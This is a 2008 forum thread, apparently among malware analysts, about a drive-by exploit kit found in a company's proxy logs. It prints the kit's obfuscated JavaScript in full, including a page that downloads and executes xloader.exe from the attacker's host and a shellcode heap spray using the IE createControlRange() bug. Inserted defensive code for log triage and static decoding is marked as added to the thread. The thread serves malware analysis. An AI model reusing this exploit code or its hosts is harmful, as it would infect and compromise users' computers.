Author Topic: Does anybody know this ?  (Read 6950 times)


September 23, 2008, 03:01:20 pm

SysAdMini

Found this today in our proxy logs.

Does anybody know edit.google.com.main.update.the-format.cn?
It downloads some Java classes and an obfuscated JavaScript, "com.php".
I have problems decoding that script. Can anybody help?

Code:
23/Sep/2008:16:32:24 +0200   1357 xxx.xxx.xxx.xxx TCP_MISS/302 461 GET http://64.233.169.104.d78e324f848df9fc.managerss.cn/index.cn/ - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:25 +0200   1427 xxx.xxx.xxx.xxx TCP_MISS/200 1519 GET http://edit.google.com.main.update.the-format.cn/lis/index.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:28 +0200    604 xxx.xxx.xxx.xxx TCP_MISS/200 590 GET http://edit.google.com.main.update.the-format.cn/lis/javac.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:37 +0200   2001 xxx.xxx.xxx.xxx TCP_MISS/200 16673 GET http://edit.google.com.main.update.the-format.cn/lis/java.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:38 +0200   2252 xxx.xxx.xxx.xxx TCP_MISS/200 16673 GET http://edit.google.com.main.update.the-format.cn/lis/java.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:39 +0200   1698 xxx.xxx.xxx.xxx TCP_MISS/200 4461 GET http://edit.google.com.main.update.the-format.cn/lis/com.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:39 +0200    717 xxx.xxx.xxx.xxx TCP_MISS/404 572 GET http://edit.google.com.main.update.the-format.cn/lis/BaaaaBaa.class - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:32:40 +0200    558 xxx.xxx.xxx.xxx TCP_MISS/404 578 GET http://edit.google.com.main.update.the-format.cn/lis/BaaaaBaa/class.class - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:33:21 +0200    847 xxx.xxx.xxx.xxx TCP_MISS/200 4462 GET http://edit.google.com.main.update.the-format.cn/lis/com.php - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:33:24 +0200    655 xxx.xxx.xxx.xxx TCP_MISS/404 571 GET http://edit.google.com.main.update.the-format.cn/lis/BaaaaBaa.class - DIRECT/200.63.48.105 text/html
 23/Sep/2008:16:33:25 +0200    694 xxx.xxx.xxx.xxx TCP_MISS/404 577 GET http://edit.google.com.main.update.the-format.cn/lis/BaaaaBaa/class.class - DIRECT/200.63.48.105 text/html

Java classes were detected as

Code:
Virus/Malware: JAVA_BYTEVER.BQ
File: C:\WINNT\TEMP\jar_cache22490.tmp (Baaaaa.class)
Date/Time: 23.09.2008 16:32:40
Result: Virus successfully detected, cannot perform the Quarantine action (Please see scan result of infected file: jar_cache22490.tmp)
---------------------------------------------------
Virus/Malware: JAVA_BYTEVER.BR
File: C:\WINNT\TEMP\jar_cache22490.tmp (BaaaaBaa.class)
Date/Time: 23.09.2008 16:32:44
Result: Virus successfully detected, cannot perform the Quarantine action (Please see scan result of infected file: jar_cache22490.tmp)
---------------------------------------------------
Virus/Malware: TROJ_JAVA.AT
File: C:\WINNT\TEMP\jar_cache22490.tmp (Dvnny.class)
Date/Time: 23.09.2008 16:32:44
Result: Virus successfully detected, cannot perform the Quarantine action (Please see scan result of infected file: jar_cache22490.tmp)
---------------------------------------------------
Virus/Malware: JAVA_BYTEVER.BS
File: C:\WINNT\TEMP\jar_cache22490.tmp (VaaaaaaaBaa.class)
Date/Time: 23.09.2008 16:32:44
Result: Virus successfully detected, cannot perform the Quarantine action (Please see scan result of infected file: jar_cache22490.tmp)
Ruining the bad guy's day
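The proxy log above already carries the indicators that make this traffic stand out before any script is decoded: a brand name ("google.com") used as a subdomain label of an unrelated registrable domain, a dotted-quad IP embedded in a hostname, a long hex label, two hostnames served by the same origin IP, and .class files being pulled through the browser. The following is an added example (not code from the thread) that parses Squid-style access log lines in the layout posted here (timestamp with zone, elapsed ms, client, cache-status/HTTP-status, bytes, method, URL, ident, hierarchy/peer, MIME type) and scores each host with those heuristics. The sample lines are copied from the post; the field names and the brand list are assumptions of this example.

```javascript
// Squid-style access log triage for the excerpt in the first post.
// Added example, not the thread's code. Field layout is taken from the lines as posted.
const LINE_RE = /^\s*(\S+ [+-]\d{4})\s+(\d+)\s+(\S+)\s+(\S+)\/(\d{3})\s+(\d+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\/(\S+)\s+(\S+)\s*$/;

// Parse one line into named fields; returns null for lines that do not match the layout.
function parseSquidLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const url = m[8];
  const host = (url.match(/^https?:\/\/([^/:]+)/) || [])[1] || '';
  return {
    time: m[1], elapsedMs: +m[2], client: m[3], cacheStatus: m[4], status: +m[5],
    bytes: +m[6], method: m[7], url, host, ident: m[9], hierarchy: m[10],
    peer: m[11], mime: m[12],
  };
}

// Brand labels that legitimately appear only as the tail of a hostname (assumed list).
const BRANDS = ['google.com', 'microsoft.com', 'windowsupdate.com'];

// Heuristics on the hostname alone.
function hostFindings(host) {
  const f = [];
  for (const b of BRANDS) {
    if (host.includes(b) && !(host === b || host.endsWith('.' + b))) {
      f.push(`brand "${b}" used as a subdomain label`);
    }
  }
  if (/^\d{1,3}(\.\d{1,3}){3}\./.test(host)) f.push('dotted-quad IP embedded as subdomain');
  if (host.split('.').some(l => /^[0-9a-f]{12,}$/.test(l))) f.push('long hex label in hostname');
  return f;
}

// Heuristics on the individual request.
function requestFindings(r) {
  const f = [];
  const path = r.url.replace(/^https?:\/\/[^/]+/, '');
  if (/\.class(\?|$)/.test(path)) f.push('Java class requested through the browser');
  return f;
}

// Aggregate per host: request count, distinct findings, and shared-origin notes.
function triage(text) {
  const byHost = new Map();
  const peers = new Map(); // origin IP -> set of hostnames it served
  for (const line of text.trim().split('\n')) {
    const r = parseSquidLine(line);
    if (!r) continue;
    const e = byHost.get(r.host) || { requests: 0, findings: new Set() };
    e.requests++;
    hostFindings(r.host).forEach(x => e.findings.add(x));
    requestFindings(r).forEach(x => e.findings.add(x));
    byHost.set(r.host, e);
    if (!peers.has(r.peer)) peers.set(r.peer, new Set());
    peers.get(r.peer).add(r.host);
  }
  // Several unrelated hostnames answered by one origin server is itself a finding.
  for (const [peer, hosts] of peers) {
    if (hosts.size > 1) {
      for (const h of hosts) byHost.get(h).findings.add(`shares origin ${peer} with ${hosts.size - 1} other host(s)`);
    }
  }
  const out = {};
  for (const [h, e] of byHost) out[h] = { requests: e.requests, findings: [...e.findings] };
  return out;
}

// Sample lines copied from the post above (client address already masked there).
const SAMPLE_LOG = `23/Sep/2008:16:32:24 +0200   1357 xxx.xxx.xxx.xxx TCP_MISS/302 461 GET http://64.233.169.104.d78e324f848df9fc.managerss.cn/index.cn/ - DIRECT/200.63.48.105 text/html
23/Sep/2008:16:32:25 +0200   1427 xxx.xxx.xxx.xxx TCP_MISS/200 1519 GET http://edit.google.com.main.update.the-format.cn/lis/index.php - DIRECT/200.63.48.105 text/html
23/Sep/2008:16:32:37 +0200   2001 xxx.xxx.xxx.xxx TCP_MISS/200 16673 GET http://edit.google.com.main.update.the-format.cn/lis/java.php - DIRECT/200.63.48.105 text/html
23/Sep/2008:16:32:39 +0200    717 xxx.xxx.xxx.xxx TCP_MISS/404 572 GET http://edit.google.com.main.update.the-format.cn/lis/BaaaaBaa.class - DIRECT/200.63.48.105 text/html`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(triage(SAMPLE_LOG), null, 2));
}
```

Run over the full excerpt, both hostnames get flagged and both are tied back to 200.63.48.105, which is the pivot worth blocking at the proxy while the script is still being analysed.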

September 23, 2008, 04:06:03 pm
Reply #1

philipp

hi,

decoding the shellcode in com.php reveals the following url:
Code:
http://dev.aero4.cn/adpack/load.php

regards,
ph

September 23, 2008, 05:24:54 pm
Reply #2

SysAdMini

Thanks, philipp.

I can decode the shellcode if I only decode the first line manually,
but Malzilla can't decode the complete script automatically.

Result from the shellcode url:
Code:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /adpack/load.php was not found on this server.<P>
<HR>
<ADDRESS>Apache/1.3 Server at dev.aero4.cn Port 80</ADDRESS>
</BODY></HTML>
Ruining the bad guy's day

September 23, 2008, 06:50:26 pm
Reply #3

bobby

Is there a missing part of this script?
Or is there some createControlRange() exploit?

Evaluate just the last line of the script, the one beginning with eval().
You will get just one line as a result.
What is with that z variable? Where is that one used? That's why I'm asking whether we are missing a part of the script.
The other possibility is that it gets executed by the createControlRange() function, but I do not know if such an exploit exists.

September 23, 2008, 06:59:25 pm
Reply #4

SysAdMini

The script is complete. It is enclosed in <script> tags.
A second attempt gave the same result.
Ruining the bad guy's day

September 23, 2008, 07:14:22 pm
Reply #5

SysAdMini

Ok, let's play that game.

hxxp://edit.google.com.main.update.the-format.cn/lis/index.php

Code:
<html><head><meta HTTP-EQUIV='REFRESH' content='2; URL=javac.php'><script> start();
function z_sa(o,p,v){ o.setAttribute(p,v); }
function start(){
var z = document.createElement('object'); z_sa(z,'id','z');z_sa(z,'classid',"cZl#sqiZdL:qBqDM9Z6ZCZ5#5Z6Z-L6L5ZAM3L-q1Z1LDq0M-M9Z8M3ZAZ-Z0M0ZCq0M4qFZCZ2Z9MEq3#6L".replace(/[MLZq#]/g, ''));
try {
var q = z.CreateObject("mZs%xJmZl%2Z.%XJMKLdHJT%TKP%".replace(/[%ZJKd]/g, ''), ''),s = z.CreateObject("S1hdeWlDlW.DAWp1pWlWiWcKaKt1ido1nW".replace(/[1dWKD]/g, ''), ''),t = z.CreateObject("awdwowdCbP.PswtSrCePaCmS".replace(/[wSCPH]/g, ''), '');
try {
t.type = 1;
q.open("GqEqT6".replace(/[96VqX]/g, ''),'http://edit.google.com.main.update.the-format.cn/lis/load.php',false);
eval("qE.xsXecncdc(E)X;Etx.EoXpcelnl(E)X;XtE.XWErXixtxec(lql.ErxeEsxpxolnEsxeEBEoEdxyE)l".replace(/[xXclE]/g, ''));
var name = ".0/z/P.O.z/t/tatdOmOiznP.0etxOet".replace(/[z0OPt]/g, '');
eval("tb.KSBabvBeETboKFBiElKeb(8nBaKm8eE,K2B)b;Etb.8CBl8oBsKeE(E)B;B".replace(/[Bb8KE]/g, ''));} catch(e) {}try { eval("sb.osoh#e#lEl#ebxqe#cbuEtEeE(#nqaEmoeb)o".replace(/[bqoE#]/g, ''));  } catch(e) {}} catch(e){}}</script></head></html>


hxxp://edit.google.com.main.update.the-format.cn/lis/javac.php
Code:
<applet archive="java.php" code="BaaaaBaa.class" width=1  height=1><param name="url" value="http://edit.google.com.main.update.the-format.cn/lis/load.php"></applet><meta HTTP-EQUIV="REFRESH" content="2;
URL=com.php">

hxxp://edit.google.com.main.update.the-format.cn/lis/load.php
downloads xloader.exe
http://www.virustotal.com/analisis/7546a66e99e92c355d0aab9c12ff9bc7

hxxp://edit.google.com.main.update.the-format.cn/lis/com.php

Code:
<script>
x=unescape("%ZuT9T0s9s0s%xux9x0Z9Z0x%ZuT1p8s6pAZ%pup6s4p5sBZ%pux0Z3x8TBx%pup4p0T8xBp%xus8pBZ3T0Z%sux1Z8Z4x0T%Zux5s8Z0T5T%Tux0p0Z0p1T%xus3s3p0x0x%Zux8p9ZDT2s%Tus8s9s1p0T%Zup0p4x5Z0s%Tux5p0Z8s9T%TuZ8p9Z0p8T%xuT0sCZ5x0x%puxCp0T8Z3x%ZuT8p9Z2Z8x%ZuT8p9Z0s0T%pux0Z4s4s0Z%ZusCZ0s8x3T%xuT6p6s0T8s%sux7s8Z3xDT%Zus7xCZ0p5T%TuZ8sBTFx2s%xup8Z1TDs8Z%sup9x0sCT3x%sux0s0p0p0Z%puZ8Z9p0T0p%TuZ3T3T1Z8s%TuT8x3sDs2p%TuZ0x4ZCZ0x%TuT1s0T8s9p%xuTCs0p8s3T%Zus8x1s0T4x%puT8p0xCs3p%pus0s0p0s0x%xux8Z9Z0Z0s%Zux3s3p1x8T%pup8p9ZCp0p%Tus8p3p0T3p%Zus0T4ZCZ3s%puZ8p1Z6s6T%TuT8s8xFxBs%suZ7xCs1sET%pux8pBZFs4T%xup8Z1TDs3x%TuZ7s0sExBp%Tup0p0p1xEs%pus6x6x0Z0s%sus3p3x8sBT%Zup8x9p6x6T%TuT4s2p3x2s%TuxCs6Z4s2p%pux0x8Z0T2x%Tus6Z6x4s2s%TuZ3s2s8sBx%suZ3s1Z6T6s%Tup4T2x3x2T%xuZCT6x4Z2p%ZuZ1x4s0Z2Z%sux6s6Z4T2p%xux3Z2p8ZBZ%suT3x1s6Z6s%Zup4s2x3x2T%pus6s6x4x2Z%suxCx3s8Z1p%Zux0s1x6p0x%pux1T3T8Z9s%pux5x3Z8x9x%puZ8T9Z0Z4x%sup8s9Z1pAT%TuT0Z4T5pAp%Zus9T0Z9x0x%pup9x0T9s0Z%Zux9p0p9x0p%sus0sfZeZbs%Zup3s3T5pbx%TuT6T6xcs9p%pus8T0xbs9x%puZ8s0Z0s1T%Zupepfx3p3Z%Zusex2p4Z3p%suxepbpfpaZ%ZuTeZ8s0p5Z%Tuxfsfxexcx%supfTfpfTfZ%xus8Tbs7Zfp%puZdTfx4pes%ZuxeTfseZfp%ZuZ6x4Tepfp%Zuxep3saTfx%suT9pfx6Z4Z%suT4x2Zfx3Z%sup9TfT6T4T%puZ6Tepep7p%suTexfp0T3x%ZuZeTfsexbx%TuZ6Z4ZeZfp%suZbT9x0T3Z%puZ6Z1x8T7T%Tupep1Zas1p%TuT0s7x0T3Z%ZuZeZfp1Z1s%puxeTfTesfT%ZuTaxaZ6s6Z%puTbZ9xeZbp%TuT7p7x8T7s%xup6s5x1x1s%puT0T7xeT1s%xuxeTfs1ZfT%suxeZfpeTfp%xuxaTax6s6x%puxbZ9Zex7T%pupcpas8T7x%pus1p0s5xfZ%puZ0p7s2ZdZ%TuZexfT0pdZ%suZeZfpeZfs%suxaZap6p6T%puTbT9xes3T%Zus0T0s8p7p%xux0pfx2s1x%puZ0x7s8ZfZ%Tuxepfx3Tbp%Zusepfsexfs%xuTasaZ6T6s%suTbs9pfTfZ%Tux2xeT8x7x%Zup0pax9p6s%puT0T7s5p7p%ZuxeTfp2x9Z%TusepfTesfx%xuZaTaZ6Z6x%Tusasfxfxbx%suTds7x6sfx%Tux9paZ2pcs%xux6s6s1p5x%xuZfx7Zaxas%puZep8T0s6p%suseZfZeTep%pupbx1ZeTfZ%xup9xap6Z6s%xup6s4ZcxbT%Tupesbpasap%puxexeZ8p5T%xus6x4ZbZ6T%suxfp7ZbTaT%xup0Z7pbT9p%ZusexfZ6T4Z%puseZfTepfx%pus8Z7xbpfT%pusfp5ZdT9T%pux9xfxcT0Z%pux7x8s0Z7x%TusesfseTfs%ZuT6s6peZfZ%puTfZ3sapap%xup2sax6x4p%sux2sfs6pcT%sup6x6TbsfT%puxcpfpapax%Tus1T0p8Z7s%ZuTesfsexfT%Zusbpfp
eTfT%Tupapap6p4s%sux8s5pfTbp%xusbZ6pepds%xusbsaZ6T4Z%xuZ0s7sfp7x%puZepfx8seZ%puTexfxeZfT%ZuTapaZexcZ%TuZ2s8Tcsfx%pupbs3TeTfZ%Tuxcp1s9s1p%suZ2x8Z8pap%ZuZepbxasfx%pup8Tap9x7p%ZuTeZfseTfp%sus9xap1s0s%Zux6s4xcpfx%pupep3sasaT%Zupepep8T5p%puT6x4xbp6Z%xupfZ7ZbZas%Zuxasfx0T7p%xuxepfZepfs%xus8p5pexfs%puxbs7xeZ8Z%TuTaZaxeZcs%TupdTcpcxbZ%Tupbscp3Z4x%TuT1Z0xbxcx%ZuTcxfp9xap%puxbZcsbpfZ%susaxap6Z4p%xup8s5xfT3Z%TuTbp6ZepaZ%pupbxaZ6x4x%pux0p7xfT7Z%xuxesfscpcT%TuZepfseTfZ%xupesfs8Z5s%xuT9Zap1p0Z%Zup6s4ZcsfZ%ZuZes7xasap%puTeTdp8T5p%xux6s4pbx6Z%puZfZ7ZbTaZ%TuZfpfx0x7p%TuTepfxesfZ%puZ8Z5ZeTfx%TuT6x4T1T0T%susfpfxaTax%TuZeses8s5x%xup6T4Tbx6Z%suZfs7pbxaT%ZupeZfx0x7p%suZeZfTeTfZ%supaTepeTfx%Tusbpdxbp4Z%xuT0TeZepcp%TuZ0ZeseTcs%Tup0sepepcp%Zux0ZeZescx%Zup0T3s6Zcx%puZbx5ZexbT%TuZ6Z4sbxcT%ZuT0pdT3p5Z%xuZbZdZ1s8Z%xuT0Tfx1T0T%Zux6T4ZbpaT%Zus6Z4T0x3T%pupex7T9Z2p%ZuxbZ2p6Z4Z%TupbZ9Tex3p%sup9xcT6s4Z%xux6T4xdT3T%supfp1p9ZbT%supeZcs9T7x%pusbx9Z1Zcs%suZ9Z9Z6p4Z%pupescxcpfZ%TuTdpcT1TcZ%xupaZ6s2Z6x%TuT4p2paseT%xuT2scZescs%xupdscTbZ9T%TuseT0x1x9T%TuZfTfs5x1x%pus1Tdsdp5s%suZes7x9pbp%sus2Z1p2ZeT%susepcTeT2p%Tusasfx1sdp%sup1TeZ0T4Z%sup1Z1Tdp4p%xuZ9ZaTbx1p%supbT5T0xaZ%TuT0p4Z6T4Z%pupbZ5s6p4s%xuZepcpcZbp%Tup8Z9s3p2T%puZeT3x6s4T%pup6x4xap4T%ZuZfx3pbp5Z%xux3Z2xeZcx%susepbT6p4s%xuxepcZ6p4s%Tusbs1p2pax%Tus2ZdTbp2p%supepfTes7Z%ZuZ1sbZ0p7Z%Zus1p0Z1x1s%ZuTbxaZ1p0p%xuZas3pbTds%Zusas0ZaT2s%ZupesfsaZ1T%sup7p4T6p8T%pux7Z0x7x4T%xuZ2pfZ3sap%xux6p4Z2xfT%xup7p6s6s5Z%Tus6T1p2pep%Tup7T2Z6p5T%Tus3T4x6Zfs%sus6Z3T2sex%xuZ2pfp6xex%pus6p4s6p1T%pup6x1s7Z0x%xup6pbx6T3Z%Tux6xcx2ZfZ%Zus6x1Z6TfZ%pux2Tes6x4T%puZ6T8p7Z0T%xup0s0s7x0T%suT0Z0x0Z0p".replace(/[pZsTx]/g, ''));
tu=unescape("%IuI0GdI0IdU%8uW08dG0IdG".replace(/[8WGIU]/g, ''));
var memz=parseInt("0OxWd@0Ad@0vdA0Wdv".replace(/[vAOW@]/g, ''));
while(tu.length<0x40000) tu+=tu;  tu=tu.substring(0,parseInt("0vxv3vfvfaev48".replace(/[8mlav]/g, ''))-x.length); o=new Array(); for(i=0;i<450;i++) o[i]=tu+x;z=Math.ceil(memz);
eval("zS=8d#oSc3u8mqe3nqt#.3s8c#r#iSp8tSs#[#03]S.3c#rqeSa#t#eqC8oSn3tqrSoSlSR#a#n8g#eq(q)q.3l#e8nqgStqh8".replace(/[q#8S3]/g, ''));
</script>

Did I miss something?
Ruining the bad guy's day
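Every string in index.php and com.php is hidden the same way: a literal padded with noise characters followed by .replace(/[noise]/g, '') to strip them again. That idiom can be undone statically, without eval() and without a browser, which is what a decoder needs here because the final line dereferences document.scripts[0].createControlRange() and only means something inside Internet Explorer. The following is an added example (not Malzilla's code and not from the thread): it finds each replace() call, applies the same character class the script does, rewrites the script into readable form, expands %u sequences to bytes so a spray pattern is visible, and reports a few indicators. The sample is constructed for this example: three strings are taken verbatim from the script above (the unescape argument, the HTTP method, and the final eval line), and the URL is a placeholder.

```javascript
// Static decoder for the `"literal".replace(/[noise]/g, '')` idiom used in index.php / com.php.
// Added example, not Malzilla's or the thread's code. Nothing here is ever eval()'d.

// Double-quoted literal without escapes followed by .replace(/[class]/g, ''), the only form the script uses.
const REPLACE_CALL = /"([^"\\]*)"\.replace\(\/\[([^\]]+)\]\/g,\s*''\)/g;

// Decode one literal exactly as the script would: remove every character in the class.
function stripNoise(literal, cls) {
  return literal.replace(new RegExp('[' + cls + ']', 'g'), '');
}

// List every encoded string with its noise class and decoded value.
function decodeReplaceCalls(src) {
  const out = [];
  for (const m of src.matchAll(REPLACE_CALL)) {
    out.push({ encoded: m[1], noise: m[2], decoded: stripNoise(m[1], m[2]) });
  }
  return out;
}

// Substitute each replace() call with its decoded literal to get a readable script.
function rewrite(src) {
  return src.replace(REPLACE_CALL, (_, lit, cls) => JSON.stringify(stripNoise(lit, cls)));
}

// Expand a %uXXXX / %XX string (the argument of unescape) into the bytes it spells,
// little-endian per %u unit, returned as a hex string.
function percentToHex(s) {
  const bytes = [];
  for (const m of s.matchAll(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g)) {
    if (m[1] !== undefined) {
      const v = parseInt(m[1], 16);
      bytes.push(v & 0xff, v >> 8);
    } else {
      bytes.push(parseInt(m[2], 16));
    }
  }
  return bytes.map(b => b.toString(16).padStart(2, '0')).join('');
}

// Indicators an analyst looks for in the rewritten script.
function indicators(src) {
  const plain = rewrite(src);
  return {
    createObject: /\.CreateObject\(/.test(plain),
    classid: /classid/i.test(plain),
    unescapeSpray: /unescape\("%u/.test(plain),
    createControlRange: /createControlRange\(\)/.test(plain),
    evalOfDecodedString: /eval\("/.test(plain),
  };
}

// Constructed sample: three strings copied from the script above, placeholder URL.
const SAMPLE = `var tu = unescape("%IuI0GdI0IdU%8uW08dG0IdG".replace(/[8WGIU]/g, ''));
q.open("GqEqT6".replace(/[96VqX]/g, ''), 'http://example.invalid/load.php', false);
eval("zS=8d#oSc3u8mqe3nqt#.3s8c#r#iSp8tSs#[#03]S.3c#rqeSa#t#eqC8oSn3tqrSoSlSR#a#n8g#eq(q)q.3l#e8nqgStqh8".replace(/[q#8S3]/g, ''));`;

if (typeof require !== 'undefined' && require.main === module) {
  for (const d of decodeReplaceCalls(SAMPLE)) console.log(JSON.stringify(d.decoded));
  console.log(rewrite(SAMPLE));
  console.log(percentToHex(decodeReplaceCalls(SAMPLE)[0].decoded));
  console.log(indicators(SAMPLE));
}
```

Because the decoder only rewrites text, it gets through the whole of com.php in one pass, including the line an eval-based tool stalls on; the decoded last line shows that z is only assigned from the createControlRange() call and never read afterwards, which is the observation bobby made above.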

September 23, 2008, 07:25:33 pm
Reply #6

bobby

I do not see anything more than you did.
It looks strange that a 3-year-old exploit is used:
http://www.google.com/search?hl=en&q=createControlRange+exploit&btnG=Google+Search&aq=f&oq=

September 23, 2008, 07:50:37 pm
Reply #7

sowhat-x

Yeah, I've also seen these ".class" files a couple of times in the past;
as philipp already said, I think they're part of a ready-made exploit kit...

September 23, 2008, 08:01:11 pm
Reply #8

SysAdMini

Quote from: sowhat-x
Yeah, I've also seen these ".class" files a couple of times in the past;
as philipp already said, I think they're part of a ready-made exploit kit...

I've seen a lot of machines in the last few days where the virus scanner detects suspicious Java classes.
I receive detection notifications from all machines in our company network. The number of JAVA_BYTEVER
detections has grown.

Ruining the bad guy's day
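The growth SysAdMini describes is easy to put in numbers from the notification records quoted in the first post (Virus/Malware, File, Date/Time and Result lines, separated by a dashed line). The following is an added example (not from the thread or the scanner vendor) that parses those records, splits the detection name into its family, separates the jar_cache container from the class inside it, and counts detections per family and day. It also counts records whose Result says the quarantine action could not be performed, since every one of those leaves the archive on disk for someone to clean up. The four records from the first post are used as sample input, plus two constructed records for an earlier day.

```javascript
// Parser and per-day summary for the scanner notification records in the first post.
// Added example, not the thread's or the vendor's code.

// Records are "Key: value" lines separated by a dashed line.
function parseNotifications(text) {
  const records = [];
  for (const chunk of text.split(/^-{5,}\s*$/m)) {
    const rec = {};
    for (const line of chunk.split('\n')) {
      const m = /^\s*([^:]+):\s*(.*\S)\s*$/.exec(line);
      if (m) rec[m[1].trim()] = m[2];
    }
    if (!rec['Virus/Malware']) continue;
    const name = rec['Virus/Malware'];
    const fileM = /^(.*?)(?:\s+\(([^)]+)\))?$/.exec(rec['File'] || '');
    const dt = /^(\d{2})\.(\d{2})\.(\d{4}) (\d{2}:\d{2}:\d{2})$/.exec(rec['Date/Time'] || '');
    records.push({
      name,
      family: name.split('.')[0],                   // JAVA_BYTEVER.BQ -> JAVA_BYTEVER
      container: fileM ? fileM[1] : '',              // the jar_cache*.tmp on disk
      member: fileM && fileM[2] ? fileM[2] : null,   // the class inside the archive
      day: dt ? `${dt[3]}-${dt[2]}-${dt[1]}` : null, // ISO date from dd.mm.yyyy
      quarantined: !/cannot perform the Quarantine action/i.test(rec['Result'] || ''),
    });
  }
  return records;
}

// Count detections per family and day, and note containers the scanner left on disk.
function summarize(records) {
  const byFamilyDay = {};
  let unquarantined = 0;
  const containers = new Set();
  for (const r of records) {
    const key = `${r.family} ${r.day}`;
    byFamilyDay[key] = (byFamilyDay[key] || 0) + 1;
    if (!r.quarantined) {
      unquarantined++;
      containers.add(r.container);
    }
  }
  return { byFamilyDay, unquarantined, containersLeftOnDisk: [...containers] };
}

// Sample input: the four records from the first post, followed by two constructed
// records for the previous day (their file name, time and result text are made up).
const SAMPLE_NOTIFICATIONS = String.raw`
Virus/Malware: JAVA_BYTEVER.BQ
File: C:\WINNT\TEMP\jar_cache22490.tmp (Baaaaa.class)
Date/Time: 23.09.2008 16:32:40
Result: Virus successfully detected, cannot perform the Quarantine action (Please see scan result of infected file: jar_cache22490.tmp)
---------------------------------------------------
Virus/Malware: JAVA_BYTEVER.BR
File: C:\WINNT\TEMP\jar_cache22490.tmp (BaaaaBaa.class)
Date/Time: 23.09.2008 16:32:44
Result: Virus successfully detected, cannot perform the Quarantine action (Please see scan result of infected file: jar_cache22490.tmp)
---------------------------------------------------
Virus/Malware: TROJ_JAVA.AT
File: C:\WINNT\TEMP\jar_cache22490.tmp (Dvnny.class)
Date/Time: 23.09.2008 16:32:44
Result: Virus successfully detected, cannot perform the Quarantine action (Please see scan result of infected file: jar_cache22490.tmp)
---------------------------------------------------
Virus/Malware: JAVA_BYTEVER.BS
File: C:\WINNT\TEMP\jar_cache22490.tmp (VaaaaaaaBaa.class)
Date/Time: 23.09.2008 16:32:44
Result: Virus successfully detected, cannot perform the Quarantine action (Please see scan result of infected file: jar_cache22490.tmp)
---------------------------------------------------
Virus/Malware: JAVA_BYTEVER.BQ
File: C:\WINNT\TEMP\jar_cache10001.tmp (Baaaaa.class)
Date/Time: 22.09.2008 09:15:02
Result: Virus successfully detected and quarantined (constructed sample record)
---------------------------------------------------
Virus/Malware: JAVA_BYTEVER.BR
File: C:\WINNT\TEMP\jar_cache10001.tmp (BaaaaBaa.class)
Date/Time: 22.09.2008 09:15:03
Result: Virus successfully detected and quarantined (constructed sample record)
---------------------------------------------------
`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(summarize(parseNotifications(SAMPLE_NOTIFICATIONS)), null, 2));
}
```

Fed with the notifications from every machine, the per-day family counts give the trend line, and containersLeftOnDisk is the list of jar caches that still need manual removal because the scanner reported it could not quarantine them.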